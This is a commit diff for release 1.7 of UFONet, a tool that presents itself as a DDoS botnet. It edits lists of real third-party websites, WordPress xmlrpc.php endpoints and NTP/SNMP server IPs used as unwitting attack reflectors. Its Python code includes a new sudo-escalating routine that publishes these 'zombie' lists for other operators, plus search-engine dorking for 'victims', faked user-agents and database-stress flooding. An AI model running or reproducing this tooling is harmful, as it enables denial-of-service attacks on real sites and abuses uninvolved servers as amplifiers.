Browse Source

release v1.7 - /KRäKEN/

psy 2 years ago
parent
commit
3b5eb310e0
30 changed files with 18376 additions and 13192 deletions
  1. 1 3
      Makefile
  2. 16 7
      README.md
  3. 0 9
      botnet/aliens.txt
  4. 0 11561
      botnet/dns.txt
  5. 0 12
      botnet/droids.txt
  6. 0 110
      botnet/ntp.txt
  7. 0 63
      botnet/rpcs.txt
  8. 0 9
      botnet/snmp.txt
  9. 0 9
      botnet/ucavs.txt
  10. 0 1073
      botnet/zombies.txt
  11. 17154 0
      core/js/jit.js
  12. 23 0
      core/js/treemap.css
  13. 134 0
      core/js/treemap.js
  14. 167 27
      core/main.py
  15. 38 37
      core/options.py
  16. 14 0
      core/txt/misc.txt
  17. 1 0
      core/txt/model.txt
  18. 1 0
      core/txt/motherships.txt
  19. 30 0
      core/txt/user-agents.txt
  20. 577 167
      core/webgui.py
  21. 0 0
      data/tv.txt
  22. 34 53
      docs/AUTHOR
  23. 129 0
      docs/FAQ.html
  24. 25 23
      docs/LEEME.txt
  25. 26 24
      docs/README.txt
  26. 1 1
      docs/README_grider.txt
  27. 1 0
      docs/VERSION
  28. 1 1
      docs/release.date
  29. 2 2
      setup.py
  30. 1 1
      ufonet

+ 1 - 3
Makefile

@@ -1,10 +1,8 @@
-# $Id: Makefile,v 1.6 2008/10/29 01:01:35 ghantoos Exp $
-#
 PYTHON=`which python`
 DESTDIR=/
 BUILDIR=$(CURDIR)/debian/ufonet
 PROJECT=ufonet
-VERSION=1.6
+VERSION=1.7
 
 all:
 	@echo "make source - Create source package"

+ 16 - 7
README.md

@@ -12,6 +12,9 @@
 on the Layer 7 (APP/HTTP) through the exploitation of Open Redirect vectors on third-party websites to act as a botnet 
 and on the Layer3 (Network) abusing the protocol.
 
+  It also works as an encrypted DarkNET to publish and receive content by creating a global client/server network based 
+on a direct-connect P2P architecture.
+
   See these links for more info:
 
    - FAQ:
@@ -131,21 +134,27 @@ in the [LICENSE](./docs/LICENSE) file.
 
 ####  Screenshots (current version!):
 
-  ![UFONet](https://ufonet.03c8.net/ufonet/ufonet-marauder-shell-1.png "UFONet Shell")
+  ![UFONet](https://ufonet.03c8.net/ufonet/ufonet-kraken-shell-1.png "UFONet Shell Version")
+
+  ![UFONet](https://ufonet.03c8.net/ufonet/ufonet-kraken-shell-2.png "UFONet Shell Board")
 
-  ![UFONet](https://ufonet.03c8.net/ufonet/ufonet-marauder-shell-2.png "UFONet Shell Board")
+  ![UFONet](https://ufonet.03c8.net/ufonet/ufonet-kraken-shell-3.png "UFONet GUI Shell")
 
-  ![UFONet](https://ufonet.03c8.net/ufonet/ufonet-marauder-shell-3.png "UFONet GUI Shell")
+  ![UFONet](https://ufonet.03c8.net/ufonet/ufonet-kraken-main_small.png "UFONet GUI Main Panel")
 
-  ![UFONet](https://ufonet.03c8.net/ufonet/ufonet-multiverse-main_small.png "UFONet GUI Main Panel")
+  ![UFONet](https://ufonet.03c8.net/ufonet/ufonet-kraken-help_small.png "UFONet GUI Help")
 
-  ![UFONet](https://ufonet.03c8.net/ufonet/ufonet-marauder-botnet.png "UFONet GUI Botnet")
+  ![UFONet](https://ufonet.03c8.net/ufonet/ufonet-kraken-botnet.png "UFONet GUI Botnet")
 
-  ![UFONet](https://ufonet.03c8.net/ufonet/ufonet-marauder-stats.png "UFONet GUI General Stats")
+  ![UFONet](https://ufonet.03c8.net/ufonet/ufonet-kraken-stats.png "UFONet GUI General Stats")
 
   ![UFONet](https://ufonet.03c8.net/ufonet/ufonet-multiverse-ranking_small.png "UFONet GUI Ranking")
 
-  ![UFONet](https://ufonet.03c8.net/ufonet/ufonet-marauder-attack.png "UFONet GUI Attack")
+  ![UFONet](https://ufonet.03c8.net/ufonet/ufonet-kraken-attack.png "UFONet GUI Attack")
+
+  ![UFONet](https://ufonet.03c8.net/ufonet/ufonet-kraken-board_small.png "UFONet GUI Board")
+
+  ![UFONet](https://ufonet.03c8.net/ufonet/ufonet-kraken-wargames_small.png "UFONet GUI Wargames")
 
   ![UFONet](https://ufonet.03c8.net/ufonet/ufonet-gui3_small.png "UFONet GeoMap /deploying/")
 

+ 0 - 9
botnet/aliens.txt

@@ -1,10 +1 @@
 https://gtmetrix.com/analyze.html;$POST;url
-https://isitdown.co.uk/check/;$POST;domainname
-https://www.site24x7.com/check-website-availability.html;$POST;url
-https://nibbler.silktide.com/en_US/report/submit;$POST;url
-https://checkwebsiteonline.com/domain;$POST;url
-https://websitechecker.online/test_url;$POST;url
-https://isitdown.co.uk/check/;$POST;domainname
-https://wheresitup.com/demo/results;$POST;url
-https://sitedown.co/views/ajax;$POST;title
-https://onlinenoffline.com/tool/check-domain/result;$POST;domain_query

File diff suppressed because it is too large
+ 0 - 11561
botnet/dns.txt


+ 0 - 12
botnet/droids.txt

@@ -1,13 +1 @@
 https://jigsaw.w3.org/css-validator/validator?uri=$TARGET&profile=css3&usermedium=all&vextwarning=true
-https://www.openadmintools.com/en/$TARGET
-http://www.statscrop.com/www/$TARGET
-https://www.whatsmydns.net/#A/$TARGET
-http://sitecheck.sucuri.net/results/$TARGET
-https://www.sslshopper.com/ssl-checker.html#hostname=$TARGET
-http://developers.google.com/speed/pagespeed/insights/?url=$TARGET
-https://gsnedders.html5.org/outliner/process.py?url=$TARGET
-http://www.siteworthtraffic.com/report/$TARGET
-http://www.textise.net/showText.aspx?strURL=$TARGET
-http://www.htmlhelp.com/cgi-bin/validate.cgi?url=$TARGET&warnings=yes&spider=yes
-https://mxtoolbox.com/SuperTool.aspx?action=$TARGET
-https://sitepanic.com/?s=$TARGET

+ 0 - 110
botnet/ntp.txt

@@ -1,111 +1 @@
 185.144.161.170
-91.121.7.182
-81.16.47.5
-194.112.182.172
-129.6.15.29
-129.6.15.30
-129.6.15.27
-129.6.15.26
-132.163.97.1
-132.163.97.2
-132.163.97.3
-132.163.97.4
-132.163.97.6
-132.163.96.1
-132.163.96.2
-132.163.96.3
-132.163.96.4
-132.163.96.6
-132.163.97.7
-128.138.140.44
-128.138.141.172
-128.138.140.50
-194.35.252.7 	
-81.168.77.149
-194.164.127.6
-130.88.203.12
-130.88.200.4
-194.207.34.9
-193.201.200.83
-194.164.127.5
-194.164.127.4
-216.239.35.8
-139.78.97.128 
-137.92.140.80
-128.250.36.2
-138.194.21.154
-130.155.98.1
-130.95.156.206
-104.31.87.35
-103.126.53.123
-129.250.35.251
-146.164.48.5
-142.3.100.2
-52.34.132.170
-146.83.8.202
-200.54.149.24
-195.113.144.201
-131.188.3.220
-131.188.3.221
-131.188.3.222
-131.188.3.223
-130.149.17.21
-130.149.17.8
-192.53.103.108
-192.53.103.104
-129.69.1.153
-138.96.64.10
-145.238.203.14
-138.96.64.10
-140.203.204.77
-193.204.114.232
-193.204.114.233
-200.23.51.102
-193.67.79.202
-193.79.237.14
-129.242.4.241
-129.6.15.28
-150.254.190.51
-193.2.4.2
-118.189.138.5
-194.58.203.20
-194.58.203.148
-194.58.204.20
-194.58.204.148
-128.9.176.30
-208.91.196.74
-193.11.166.8
-193.11.166.20
-194.58.202.20
-194.58.202.148
-192.36.143.150
-192.36.143.151
-162.23.41.10
-195.186.1.100
-104.31.86.35
-193.62.22.98
-199.165.76.11
-204.123.2.5
-164.67.62.194
-149.20.64.28
-209.81.9.7
-192.12.19.20
-204.232.226.192
-208.91.196.74
-132.163.96.1
-132.163.96.2
-132.163.96.3
-132.163.96.4
-128.138.140.44
-192.5.41.209
-192.5.41.40
-128.4.1.1
-128.4.1.2
-128.175.60.175
-128.227.205.3
-130.207.244.240
-140.31.199.22
-96.126.107.76
-173.162.192.156
-192.101.21.1
-146.186.222.14

+ 0 - 63
botnet/rpcs.txt

@@ -1,64 +1 @@
-https://heightsmedia.com/xmlrpc.php
-http://www.ch-orthez.fr/xmlrpc.php
-http://178.62.42.31/xmlrpc.php
-http://131.220.122.225/xmlrpc.php
-http://192.81.222.191/xmlrpc.php
-http://104.236.21.36/xmlrpc.php
-http://128.199.97.120/xmlrpc.php
-http://122.117.66.52/xmlrpc.php
-http://apollomedia.de/xmlrpc.php
-http://www.lifequest-services.com/xmlrpc.php
-http://broketobooked.com/xmlrpc.php
-http://blog.libinpan.com/xmlrpc.php
-http://extensor.no/xmlrpc.php
-http://gotchacovered.bm/xmlrpc.php
-http://missionglobal.com/xmlrpc.php
-http://kompetensnavet.org/xmlrpc.php
-http://195.189.95.152/xmlrpc.php
-http://vatsim-scandinavia.org/xmlrpc.php
-http://www.skidmoreandhall.com/xmlrpc.php
-http://sgcl.ssu.ac.kr/xmlrpc.php
-http://stikespantirapih.ac.id/xmlrpc.php
 https://sifat.org/xmlrpc.php
-http://www.bankingonmainstreet.com/xmlrpc.php
-http://de.alanyatours.net/xmlrpc.php
-http://www.acupeace.com/xmlrpc.php
-http://www.aandd-ps.com/xmlrpc.php
-http://www.egpos.org/xmlrpc.php
-http://www.drivingsales.tv/xmlrpc.php
-http://www.idealvpn.com/xmlrpc.php
-http://www.meteo-agriculture.eu/xmlrpc.php
-http://www.formpac.com/xmlrpc.php
-http://www.mirchimusicawards.com/xmlrpc.php
-http://www.markgoessens.nl/xmlrpc.php
-http://www.openschooldns.com/xmlrpc.php
-http://www.theshawcentre.org.uk/xmlrpc.php
-http://www.fadhilza.com/xmlrpc.php
-http://www.tman.ca/hanas/xmlrpc.php
-http://www.supersupport.com/xmlrpc.php
-http://www.wheresmalta.com/xmlrpc.php
-http://www.unabashedresearch.com/xmlrpc.php
-http://blog.speedbit.com/xmlrpc.php
-http://clothingasconversation.com/xmlrpc.php
-http://preprod.chu-amiens.fr/xmlrpc.php
-http://wp.omni-tech.net/xmlrpc.php
-http://www.bedfactorycontracts.co.uk/xmlrpc.php
-http://www.zs18.wroc.pl/xmlrpc.php
-http://eldermet.ucc.ie/xmlrpc.php
-http://www.litteratureaudio.com/wordpress/xmlrpc.php
-http://digitalequality.net/xmlrpc.php
-http://www.niitsuhome.com/wp/xmlrpc.php
-http://www.fmfracing.com/wordpress/xmlrpc.php
-http://mpillumination.com/xmlrpc.php
-https://www.e-publicrealestate.gr/xmlrpc.php
-http://www.sbc4d.com/xmlrpc.php
-http://www.emotion.lu/xmlrpc.php
-https://mylivegym.gr/xmlrpc.php
-https://contributionliberatoire.com/xmlrpc.php
-https://eurocomment.eu/xmlrpc.php
-https://mett.nl/wp/xmlrpc.php
-https://coco-kikaku.com/wp/xmlrpc.php
-https://www.macbathsanitair.nl/xmlrpc.php
-https://www.stcutrecht.nl/xmlrpc.php
-https://www.fedegari.com/xmlrpc.php
-https://loloholodge.com/xmlrpc.php

+ 0 - 9
botnet/snmp.txt

@@ -1,10 +1 @@
 91.209.18.121
-141.0.173.136
-213.251.149.156
-188.166.0.146
-80.151.159.249
-146.247.132.41
-200.183.132.53
-50.78.18.195
-112.213.83.161
-94.176.237.178

+ 0 - 9
botnet/ucavs.txt

@@ -1,10 +1 @@
 https://website-down.com/
-https://isitup.org/
-https://www.downforeveryoneorjustme.com/
-https://www.isitdownrightnow.com/
-https://check-host.net/ip-info?host=
-https://www.isthissitedown.org/site/
-https://downdetector.com/search/?q=
-https://updowntoday.com/en/sites/
-https://isitdown.co.uk/
-https://www.isthissitedown.org/site/

File diff suppressed because it is too large
+ 0 - 1073
botnet/zombies.txt


File diff suppressed because it is too large
+ 17154 - 0
core/js/jit.js


+ 23 - 0
core/js/treemap.css

@@ -0,0 +1,23 @@
+#infovis {
+    position:relative;
+    width:1024px;
+    height:768px;
+    margin:auto;
+    overflow:hidden;
+}
+
+.tip {
+    color: yellow;
+    width: 339px;
+    background-color: black;
+    border:1px solid yellow;
+    -moz-box-shadow:#555 2px 2px 8px;
+    -webkit-box-shadow:#555 2px 2px 8px;
+    -o-box-shadow:#555 2px 2px 8px;
+    box-shadow:#555 2px 2px 8px;
+    opacity:0.9;
+    filter:alpha(opacity=90);
+    font-size:10px;
+    font-family: Courier, 'Courier New', monospace;
+    padding:14px;
+}

File diff suppressed because it is too large
+ 134 - 0
core/js/treemap.js


+ 167 - 27
core/main.py

@@ -81,6 +81,7 @@ class UFONet(object):
         self.streams_file = "data/streams.txt" # set source path to retrieve [Blackhole] [Streams]
         self.globalnet_file = "data/globalnet.txt" # set source path to retrieve [Blackhole] [Globalnet]
         self.news_file = "data/news.txt" # set source path to retrieve [Blackhole] [News]
+        self.tv_file = "data/tv.txt" # set source path to retrieve [Blackhole] [TV]
         self.missions_file = "data/missions.txt" # set source path to retrieve [Blackhole] [Missions]
         self.board_file = "data/board.txt" # set source path to retrieve [Blackhole] [Board]
         self.grid_file = "data/grid.txt" # set source path to retrieve [Blackhole] [Grid]
@@ -91,6 +92,15 @@ class UFONet(object):
         self.port = "8080" # default injection port
         self.mothershipname = "core/txt/shipname.txt"
         self.default_mothership_name = "l4m3r-lulz/0\n" # default mothership name
+        self.mothership_model_file = 'core/txt/model.txt' # set source for mothership model
+        self.warping_path = '/var/www/ufonet' # set source for warping path
+        self.warping_folder_permissions = 0o644 # set permission for warping folder
+        f = open(self.mothership_model_file) # extract mothership model
+        self.mothership_model = f.readlines()
+        for model in self.mothership_model:
+            model = model.rstrip('\n')
+        self.mothership_model = model
+        f.close()
         self.mothership_baptism() # generating static name/id for your mothership ;-)
         self.head = False
         self.payload = False
@@ -193,10 +203,10 @@ class UFONet(object):
         return self.options
 
     def banner_welcome(self):
-        print("")
-        print("          ||          /\        ||              #===============================================#")
+        print("                     ____                                                                        ")
+        print("          ||        / /\ \      ||              #===============================================#")
         print("        -(00)-     + (XX) +   -(00)-            ||                                             ||")
-        print("   ||     ||      *~~~~~~~~*    ||        ||    ||  > Botnet [DDoS]   #  > Close Combat [DoS]  ||")
+        print("   ||     ||   O ==*~~~~~~*== 0 ||        ||    ||  > Botnet [DDoS]   #  > Close Combat [DoS]  ||")
         print(" -(00)-          (0)  XX  (0)           -(00)-  ||                                             ||")
         print("   ||             \| (00) |/              ||    ||     |-> ZOMBIES    #     |-> LOIC           ||")
         print("        (O)_  (O)  0'----'0  (O)  _(O)          ||     |-> DROIDS     #     |-> LORIS          ||")   
@@ -214,7 +224,7 @@ class UFONet(object):
         print("     '.__ ____0_'.|__'--'__|.'_0____ __.'       #|=============================================|#")
         print("    .'_.-|            YY            |-._'.      ||                                             ||")
         print("                                                ||  -> [ UFONet: https://ufonet.03c8.net ] <-  ||") 
-        print("    + Class: PSYoPs / ViPR404+ (model I^) +     ||                                             ||")
+        print("   + Class: PSYoPs / "+str(self.mothership_model)+" +     ||                                             ||")
         print("                                                #|=============================================|#") 
         print("")
 
@@ -318,9 +328,9 @@ class UFONet(object):
             self.agents.append(agent)
         self.user_agent = random.choice(self.agents).strip()
         self.search_engines = [] # available dorking search engines
-        self.search_engines.append('bing') # [01/02/2020: OK!]
-        self.search_engines.append('yahoo') # [01/02/2020: OK!]
-        self.search_engines.append('duck') # [01/02/2020: OK!]
+        self.search_engines.append('bing') # [13/07/2021: OK!]
+        self.search_engines.append('yahoo') # [13/07/2021: OK!]
+        self.search_engines.append('duck') # [13/07/2021: OK!]
         #self.search_engines.append('startpage') # [01/02/2020: deprecated! -> blocking instream params search]
         #self.search_engines.append('yandex') # [03/02/2018: deprecated! -> captchasound]
         #self.search_engines.append('google') # [09/08/2016: modified -> not working from TOR]
@@ -1306,6 +1316,135 @@ class UFONet(object):
             self.create_web_interface()
             return
 
+        # deploy data to share in [/var/www/ufonet]
+        if options.deploy is not None:
+            self.banner()
+            euid = self.checkeuid()
+            if euid != 0:
+                print("\n[Info] [AI] [Control] [DEPLOY] (--deploy) not started as root...\n")
+                try:
+                    args = ['sudo', sys.executable] + sys.argv + [os.environ]
+                    os.execlpe('sudo', *args)
+                except:
+                    pass
+            try:
+                print("\n[AI] Trying to deploy data to share in: '"+self.warping_path+"'\n")
+                np = r''+self.warping_path+'' 
+                if not os.path.exists(np):
+                    os.makedirs(np)
+                    print("[AI] Created folder at: '"+self.warping_path+"'\n")
+                else:
+                    print("[AI] Path to folder: '"+self.warping_path+"' exists! -> [PASSING!]\n")
+                from pathlib import Path # import pathlib
+                import shutil # import shutil
+                src = 'data/'
+                files=os.listdir(src)
+                print("[AI] GUI [Data] has been deployed...\n")
+                for fname in files:
+                    shutil.copy2(os.path.join(src,fname), self.warping_path)
+                    print("   - "+fname+" -> "+self.warping_path+"/"+fname)
+                    os.chmod(self.warping_path+"/"+fname, self.warping_folder_permissions)
+                print("")
+                src2 = 'botnet/'
+                files=os.listdir(src2)
+                print("[AI] CORE [Botnet] has been deployed...\n")
+                for fname in files:
+                    shutil.copy2(os.path.join(src2,fname), self.warping_path)
+                    if fname == 'zombies.txt':
+                        in_file = self.warping_path+"/"+fname
+                        in_data = open(in_file, "rb").read()
+                        out_gz = self.warping_path+"/"+"abductions.txt.gz"
+                        gzf = gzip.open(out_gz, "wb")
+                        gzf.write(in_data)
+                        gzf.close()
+                        os.unlink(in_file)
+                        print("   - "+fname+" -> "+self.warping_path+"/"+"abductions.txt.gz")
+                        os.chmod(self.warping_path+"/"+"abductions.txt.gz", self.warping_folder_permissions)
+                    if fname == 'aliens.txt':
+                        in_file = self.warping_path+"/"+fname
+                        in_data = open(in_file, "rb").read()
+                        out_gz = self.warping_path+"/"+"troops.txt.gz"
+                        gzf = gzip.open(out_gz, "wb")
+                        gzf.write(in_data)
+                        gzf.close()
+                        os.unlink(in_file)
+                        print("   - "+fname+" -> "+self.warping_path+"/"+"troops.txt.gz")
+                        os.chmod(self.warping_path+"/"+"troops.txt.gz", self.warping_folder_permissions)
+                    if fname == 'droids.txt':
+                        in_file = self.warping_path+"/"+fname
+                        in_data = open(in_file, "rb").read()
+                        out_gz = self.warping_path+"/"+"robots.txt.gz"
+                        gzf = gzip.open(out_gz, "wb")
+                        gzf.write(in_data)
+                        gzf.close()
+                        os.unlink(in_file)
+                        print("   - "+fname+" -> "+self.warping_path+"/"+"robots.txt.gz")
+                        os.chmod(self.warping_path+"/"+"robots.txt.gz", self.warping_folder_permissions)
+                    if fname == 'ucavs.txt':
+                        in_file = self.warping_path+"/"+fname
+                        in_data = open(in_file, "rb").read()
+                        out_gz = self.warping_path+"/"+"drones.txt.gz"
+                        gzf = gzip.open(out_gz, "wb")
+                        gzf.write(in_data)
+                        gzf.close()
+                        os.unlink(in_file)
+                        print("   - "+fname+" -> "+self.warping_path+"/"+"drones.txt.gz")
+                        os.chmod(self.warping_path+"/"+"drones.txt.gz", self.warping_folder_permissions)
+                    if fname == 'rpcs.txt':
+                        in_file = self.warping_path+"/"+fname
+                        in_data = open(in_file, "rb").read()
+                        out_gz = self.warping_path+"/"+"reflectors.txt.gz"
+                        gzf = gzip.open(out_gz, "wb")
+                        gzf.write(in_data)
+                        gzf.close()
+                        os.unlink(in_file)
+                        print("   - "+fname+" -> "+self.warping_path+"/"+"reflectors.txt.gz")
+                        os.chmod(self.warping_path+"/"+"reflectors.txt.gz", self.warping_folder_permissions)
+                    if fname == 'snmp.txt':
+                        in_file = self.warping_path+"/"+fname
+                        in_data = open(in_file, "rb").read()
+                        out_gz = self.warping_path+"/"+"bosons.txt.gz"
+                        gzf = gzip.open(out_gz, "wb")
+                        gzf.write(in_data)
+                        gzf.close()
+                        os.unlink(in_file)
+                        print("   - "+fname+" -> "+self.warping_path+"/"+"bosons.txt.gz")
+                        os.chmod(self.warping_path+"/"+"bosons.txt.gz", self.warping_folder_permissions)
+                    if fname == 'ntp.txt':
+                        in_file = self.warping_path+"/"+fname
+                        in_data = open(in_file, "rb").read()
+                        out_gz = self.warping_path+"/"+"crystals.txt.gz"
+                        gzf = gzip.open(out_gz, "wb")
+                        gzf.write(in_data)
+                        gzf.close()
+                        os.unlink(in_file)
+                        print("   - "+fname+" -> "+self.warping_path+"/"+"crystals.txt.gz")
+                        os.chmod(self.warping_path+"/"+"crystals.txt.gz", self.warping_folder_permissions)
+                    if fname == 'dns.txt':
+                        in_file = self.warping_path+"/"+fname
+                        in_data = open(in_file, "rb").read()
+                        out_gz = self.warping_path+"/"+"warps.txt.gz"
+                        gzf = gzip.open(out_gz, "wb")
+                        gzf.write(in_data)
+                        gzf.close()
+                        os.unlink(in_file)
+                        print("   - "+fname+" -> "+self.warping_path+"/"+"warps.txt.gz")
+                        os.chmod(self.warping_path+"/"+"warps.txt.gz", self.warping_folder_permissions)
+                    if fname == 'dorks.txt':
+                        print("   - "+fname+" -> "+self.warping_path+"/"+fname)
+                        os.chmod(self.warping_path+"/"+fname, self.warping_folder_permissions)
+                print("")
+                print("[AI] [Info] [Control] [DEPLOY] Files are ready to be shared with other 'motherships'...\n\n[AI] [Info] [DEPLOY] Other requirements:\n")
+                print("   - 1) Setup web server (apache, nginx...)")
+                print("   - 2) Make your web server accessible from the Internet (NAT/VPS) <-> ex: 'http(s)://<your ip>/ufonet/'")
+                print("     - 3a) Start [Blackhole] with: './ufonet --blackhole' (or python3 ufonet --blackhole &)")
+                print("     - 3b) Start [Grider] with: './ufonet --grider' (or python3 ufonet --grider &)")
+                print("   - 4) Share your IP on the sneaknet! (ex: SHIP.RADAR) ;-)")
+                print("")
+            except Exception as e:
+                print("[Error] "+str(e))
+                print("\n[AI] Something was wrong deploying in: '/var/www/ufonet'... -> [Aborting!]\n")
+
         # generate [Blackhole] server to share [Zombies]
         if options.blackhole is not None:
             self.banner()
@@ -2311,6 +2450,8 @@ class UFONet(object):
         if self.options.forcessl:
             news = urllib.request.Request('https://'+self.blackhole+'/ufonet/news.txt', None, headers) 
             news_reply = urllib.request.urlopen(news, context=self.ctx, timeout=timeout).read().decode('utf-8')
+            tv = urllib.request.Request('https://'+self.blackhole+'/ufonet/tv.txt', None, headers)
+            tv_reply = urllib.request.urlopen(tv, context=self.ctx, timeout=timeout).read().decode('utf-8')
             missions = urllib.request.Request('https://'+self.blackhole+'/ufonet/missions.txt', None, headers)                         
             missions_reply = urllib.request.urlopen(missions, context=self.ctx, timeout=timeout).read().decode('utf-8')
             board = urllib.request.Request('https://'+self.blackhole+'/ufonet/board.txt', None, headers)
@@ -2328,6 +2469,8 @@ class UFONet(object):
         else:
             news = urllib.request.Request('http://'+self.blackhole+'/ufonet/news.txt', None, headers)
             news_reply = urllib.request.urlopen(news, context=self.ctx).read().decode('utf-8')
+            tv = urllib.request.Request('http://'+self.blackhole+'/ufonet/tv.txt', None, headers)
+            tv_reply = urllib.request.urlopen(tv, context=self.ctx).read().decode('utf-8')
             missions = urllib.request.Request('http://'+self.blackhole+'/ufonet/missions.txt', None, headers)
             missions_reply = urllib.request.urlopen(missions, context=self.ctx).read().decode('utf-8')
             board = urllib.request.Request('http://'+self.blackhole+'/ufonet/board.txt', None, headers)
@@ -2345,6 +2488,9 @@ class UFONet(object):
         f = open(self.news_file, 'w')
         f.write(news_reply)
         f.close()
+        f = open(self.tv_file, 'w')
+        f.write(tv_reply)
+        f.close()
         f = open(self.missions_file, 'w')
         f.write(missions_reply)
         f.close()
@@ -2382,6 +2528,8 @@ class UFONet(object):
             print("[Info] [AI] [Links]    : OK!")
         if streams_reply:
             print("[Info] [AI] [Streams]  : OK!")
+        if tv_reply:
+            print("[Info] [AI] [TV]       : OK!")
         if globalnet_reply:
             print("[Info] [AI] [GlobalNet]: OK!")
         print('-'*25)
@@ -2489,9 +2637,6 @@ class UFONet(object):
             if abductions_reply == "" and troops_reply == "" and robots_reply == "" and drones_reply == "" and reflectors_reply == "" and crystals_reply == "" and warps_reply == "" and bosons_reply == "":
                 print("[AI] [Control] [Blackhole] [Server] Reply: [VORTEX FAILED!]")
                 print('-'*12 + '\n')
-                print("[Info] [AI] You can try to download [Zombies] from a different [Blackhole] [Server] (provided by someone!) with:\n\n ex: ufonet --down-from '<IP>'")
-                print("\nOr/And from a [Blackhole] [GitHub] with:\n\n ex: ufonet --download-github")
-                print('-'*12 + '\n')
                 print("[Error] [AI] Unable to download list of [Zombies] from this [Blackhole] [Server] -> [Exiting!]\n")
                 return
             f = open('botnet/abductions.txt.gz', 'wb')
@@ -2522,9 +2667,6 @@ class UFONet(object):
         except:
             print("[AI] [Control] [Blackhole] [Server] Reply: [VORTEX FAILED!]")
             print('-'*12 + '\n')
-            print("[Info] [AI] You can try to download [Zombies] from a different [Blackhole] [Server] (provided by someone!) with:\n\n ex: ufonet --down-from '<IP>'")
-            print("\nOr/And from a [Blackhole] [GitHub] with:\n\n ex: ufonet --download-github")
-            print('-'*12 + '\n')
             print("[Error] [AI] Unable to download list of [Zombies] from this [Blackhole] [Server] -> [Exiting!]\n")
             return
         print('-'*12 + '\n')
@@ -3141,8 +3283,7 @@ class UFONet(object):
             self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
             headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
             if options.verbose:
-                print("[Info] [AI] Query used: " + url)
-                print("\n" + '-'*44 + '\n')
+                print(("[Info] [AI] [DORKING] Query used: " + url + "\n"))
             try:
                 if options.proxy: # set proxy
                     self.proxy_transport(options.proxy)
@@ -3196,7 +3337,7 @@ class UFONet(object):
             self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
             headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
             if options.verbose:
-                print(("Query used: " + url + "\n"))
+                print(("[Info] [AI] [DORKING] Query used: " + url + "\n"))
             try:
                 if options.proxy: # set proxy
                     self.proxy_transport(options.proxy)
@@ -3237,7 +3378,7 @@ class UFONet(object):
             self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
             headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
             if options.verbose:
-                print("Query used: " + url + " (POST: "+ data + ")\n")
+                print("[Info] [AI] [DORKING] Query used: " + url + " (POST: "+ data + ")\n")
             try:
                 if options.proxy: # set proxy
                     self.proxy_transport(options.proxy)
@@ -3324,18 +3465,17 @@ class UFONet(object):
             else:
                 if url_link not in zombies and url_link+os.linesep not in zombies_found and url_link != "": # AI mode (parsing search engines mixed pool and stored army)
                     print('+Victim found: ' + url_link)
-                    print('-'*12)
                     zombies.append(url_link)
                 else:
                     pass
         if len(zombies) == 0: # print dorking results
-            print("[Info] [AI] NOT any NEW victim(s) found for this query!")
+            print("[Info] [AI] NOT any NEW victim(s) found for this query!\n")
             if not options.dorks:
                 if not options.autosearch:
                     if not self.options.forceyes:
                         return #sys.exit(2)
-        print("\n" + '-'*44 + '\n')
         self.total_possible_zombies = self.total_possible_zombies + len(zombies)
+        print("")
         return zombies
 
     def check_nat(self):
@@ -5054,9 +5194,9 @@ class UFONet(object):
             length = 1 # search for one different (alphanumeric) character each time will produces more positive results on db
         key = str(random_key(length))
         if self.db_flash > 9:
-            print("[Info] [DBStress] Trying database request to: " + db_input + " | Query used: db flash! " + "(" + str(length) + " chars)")
+            print("[Info] [AI] [DBStress] Trying database request to: " + db_input + " | Query used: db flash! " + "(" + str(length) + " chars)")
         else:
-            print("[Info] [DBStress] Trying database request to: " + db_input + " | Query used: " + key)
+            print("[Info] [AI] [DBStress] Trying database request to: " + db_input + " | Query used: " + key)
         self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
         headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
         if not target.endswith('/'): # add "/" to end of target
@@ -5069,15 +5209,15 @@ class UFONet(object):
             req_reply = urllib.request.urlopen(req, context=self.ctx).read().decode('utf-8')
         except urllib.error.HTTPError as e:
             if e.code == 401:
-                print('[Info] [DBStress] Not authorized')
+                print('[Info] [AI] [DBStress] Not authorized')
             elif e.code == 404:
-                print('[Info] [DBStress] Not found')
+                print('[Info] [AI] [DBStress] Not found')
             elif e.code == 503:
-                print('[Info] [DBStress] Service unavailable')
+                print('[Info] [AI] [DBStress] Service unavailable')
             else:
-                print('[Info] [DBStress] Unknown error')
+                print('[Info] [AI] [DBStress] Unknown error')
         else:
-            print('[Info] [DBStress] Database query: HIT!')
+            print('[Info] [AI] [DBStress] Database query: HIT!')
 
     def attackme(self, zombies):
         # perform a DDoS Web attack against yourself

File diff suppressed because it is too large
+ 38 - 37
core/options.py


+ 14 - 0
core/txt/misc.txt

@@ -49,6 +49,7 @@ The Universe is full-linked by a "Quasi-Crystalline Spin Network of Tetrahedra".
 The possession of the force inevitably harms the free exercise of reason...
 Yes, we scan!
 If you are flexible, you will stay straight...
+Rage Agains The Capitalism...
 They do not deserve to be heard; their theories provoke precisely the evils they point to...
 When the scoundrel reigns, the crown weighs twice as much for the peasant...
 Everything has its beauty, but not everyone can see it...
@@ -65,3 +66,16 @@ We are Anonymous. We are Legion. We do not forgive. We do not forget. Expect us.
 Power to the people!
 Rage Against The Poverty...
 #UFONet FAQ: https://ufonet.03c8.net/FAQ.html
+Strength is not achieved from a position of strength. Strength is achieved, from a position of weakness!...
+Today is a good day for Science...
+Rage Against The Establishment...
+Politics is basically: the parasitization of social movements...
+Love is the intersection between: admiration, passion and respect... 
+A sad generation with happy photos...
+We are the will of desire...
+Capitalism will let you be everything revolutionary that let Capitalism do well...
+The perception is the key to change...
+Sometimes building. Sometimes destroying...
+Even the dogs have dreams...
+The only way to equality it is precisely, through difference...
+Fight the power!

+ 1 - 0
core/txt/model.txt

@@ -0,0 +1 @@
+ViPR404+/(model:I^3)

+ 1 - 0
core/txt/motherships.txt

@@ -150,3 +150,4 @@ EVILCorp
 Cepheus
 NagiOS
 VestraX
+BP

+ 30 - 0
core/txt/user-agents.txt

@@ -134,3 +134,33 @@ Mozilla/5.0 (Linux; U; en-US) AppleWebKit/528.5+ (KHTML, like Gecko, Safari/528.
 Mozilla/5.0 (PlayStation Vita 3.61) AppleWebKit/537.73 (KHTML, like Gecko) Silk/3.2
 Mozilla/5.0 (PlayStation 4 3.11) AppleWebKit/537.73 (KHTML, like Gecko)
